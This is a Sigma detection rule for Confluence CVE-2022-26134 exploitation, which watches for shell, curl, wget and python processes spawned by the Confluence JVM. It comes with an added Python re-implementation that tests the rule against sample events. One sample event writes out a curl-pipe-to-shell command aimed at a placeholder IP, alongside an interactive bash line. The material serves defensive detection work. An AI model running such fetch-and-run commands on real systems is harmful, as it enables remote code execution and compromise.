Atlassian Confluence CVE-2022-26134

Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134

Sigma rule (View on GitHub)

title: Atlassian Confluence CVE-2022-26134
id: 7fb14105-530e-4e2e-8cfb-99f7d8700b66
related:
    - id: 245f92e3-c4da-45f1-9070-bc552e06db11
      type: derived
status: test
description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134
references:
    - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-03
tags:
    - attack.initial-access
    - attack.execution
    - attack.t1190
    - attack.t1059
    - cve.2022-26134
    - detection.emerging-threats
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        # Monitor suspicious child processes spawned by Confluence
        ParentImage|startswith: '/opt/atlassian/confluence/'
        ParentImage|endswith: '/java'
        CommandLine|contains:
            - '/bin/sh'
            - 'bash'
            - 'dash'
            - 'ksh'
            - 'zsh'
            - 'csh'
            - 'fish'
            - 'curl'
            - 'wget'
            - 'python'
    condition: selection
falsepositives:
    - Unknown
level: high
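To make the matching semantics concrete, the following is an added Python re-implementation of the rule's selection block, run over a handful of constructed process_creation events. It is not SigmaHQ code and not a Sigma backend; the event dictionaries, host paths and the download URL in them are made up for illustration. It applies the Sigma conventions that matter here: the two ParentImage modifiers are ANDed, the CommandLine list is ORed, and all three modifiers are case-insensitive substring tests.

```python
"""Re-implementation of the selection logic of Sigma rule
7fb14105-530e-4e2e-8cfb-99f7d8700b66 over constructed sample events.
Added example; not SigmaHQ code."""

# Values copied from the rule's detection block.
PARENT_PREFIX = "/opt/atlassian/confluence/"
PARENT_SUFFIX = "/java"
CMDLINE_TERMS = ["/bin/sh", "bash", "dash", "ksh", "zsh",
                 "csh", "fish", "curl", "wget", "python"]


def matches(event: dict) -> bool:
    """Return True if the event satisfies the rule's 'selection'.

    Sigma semantics: fields inside one selection are ANDed, list values
    under a single field are ORed, and startswith/endswith/contains are
    case-insensitive, so both sides are lower-cased before comparison.
    """
    parent = event.get("ParentImage", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    if not (parent.startswith(PARENT_PREFIX) and parent.endswith(PARENT_SUFFIX)):
        return False
    return any(term in cmdline for term in CMDLINE_TERMS)


def run(events: list) -> list:
    """Filter a batch of events, returning only those that fire the rule."""
    return [e for e in events if matches(e)]


# Constructed sample events (not real telemetry). The IP and URL are
# placeholders from a documentation range.
SAMPLE_EVENTS = [
    # Confluence JVM launching a shell that pulls a payload: fires.
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java",
     "Image": "/bin/sh",
     "CommandLine": "/bin/sh -c curl http://198.51.100.7/x | sh"},
    # Interactive bash under the Confluence JVM: fires.
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java",
     "Image": "/usr/bin/bash",
     "CommandLine": "bash -i"},
    # Same command, but the parent is a non-Confluence JVM: does not fire.
    {"ParentImage": "/usr/lib/jvm/java-11/bin/java",
     "Image": "/bin/sh",
     "CommandLine": "/bin/sh -c id"},
    # Confluence parent, but no listed term in the command line: does not fire.
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java",
     "Image": "/usr/bin/id",
     "CommandLine": "id"},
    # 'dash' is matched as a plain substring, so a hypothetical
    # '--dashboard' flag under the Confluence JVM fires too.
    {"ParentImage": "/opt/atlassian/confluence/jre/bin/java",
     "Image": "/usr/local/bin/report-tool",
     "CommandLine": "/usr/local/bin/report-tool --dashboard"},
]

if __name__ == "__main__":
    for hit in run(SAMPLE_EVENTS):
        print("ALERT level=high:", hit["CommandLine"])
```

The last sample event is the point to keep in mind when tuning: `contains` is a substring test, so `dash`, `csh`, `fish` and `python` also hit on unrelated tokens that embed them (`--dashboard`, `PYTHONPATH=`), which is consistent with the rule listing its false positives as Unknown. Note also that the parent-path check is anchored to `/opt/atlassian/confluence/`, so a Confluence installed elsewhere, or one using a system JVM outside that tree, would need the prefix adjusted.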
